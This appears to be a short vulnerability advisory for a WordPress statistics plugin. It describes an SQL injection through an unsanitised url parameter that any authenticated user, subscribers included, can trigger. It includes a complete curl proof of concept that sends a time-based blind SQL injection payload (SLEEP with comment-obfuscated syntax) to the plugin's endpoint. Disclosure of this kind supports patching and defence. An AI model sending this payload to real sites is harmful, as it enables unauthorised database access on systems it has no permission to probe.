Description The plugins do not properly sanitise and escape the url parameter before using it in a SQL statement, leading to an SQL injection exploitable by any authenticated users, such as subscribers
curl 'https://example.com/burst-statistics-endpoint.php' \
-H 'content-type: text/plain;charset=UTF-8' \
--data-raw $'"{\\"fingerprint\\":false,\\"uid\\":\\"437a969907141c6c2042731efd2da038\\",\\"url\\":\\"https://example.com/abc\'/**/OR/**/(SELECT/**/*/**/FROM/**/(SELECT/**/SLEEP(5))a)/**/OR/**/1=\'\\",\\"time_on_page\\":6907,\\"completed_goals\\":[]}"' \
--compressed